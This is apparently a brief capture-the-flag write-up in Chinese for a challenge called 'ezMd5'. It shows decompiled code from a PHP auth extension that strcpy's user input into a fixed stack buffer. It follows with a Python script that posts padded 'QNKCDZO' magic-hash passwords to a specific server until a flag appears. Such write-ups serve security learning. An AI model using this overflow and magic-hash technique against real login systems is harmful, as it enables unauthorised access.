ezMd5
存在auth.so文件
Php::Parameters *__fastcall auth(Php::Parameters *a1, __int64 a2)
{
__int64 v2; // rax
__int64 v3; // rax
char v5; // [rsp+10h] [rbp-60h]
char v6[8]; // [rsp+30h] [rbp-40h]
unsigned __int64 v7; // [rsp+58h] [rbp-18h]
v7 = __readfsqword(0x28u);
strcpy(v6, "21232f297a57a5a743894a0e4a801fc3");
v2 = std::vector<Php::Value,std::allocator<Php::Value>>::operator[](a2, 1LL);
v3 = Php::Value::operator char const*(v2);
strcpy(&v5, v3);
Php::Value::Value(a1, v6, -1);
return a1;
}
爆破
import requests
url = "http://122.112.253.121:10032/"
for i in range(50):
password = 'a' * i + 'QNKCDZO'
payload = {'name': 's878926199a', 'password': password}
files = []
headers = {
'X-Forwarded-For': ''
}
response = requests.request("POST", url, headers=headers, data=payload, files=files)
if response.text.find('flag{') != -1:
print(payload)
print(response.text.encode('utf8'))
Last modified 8mo ago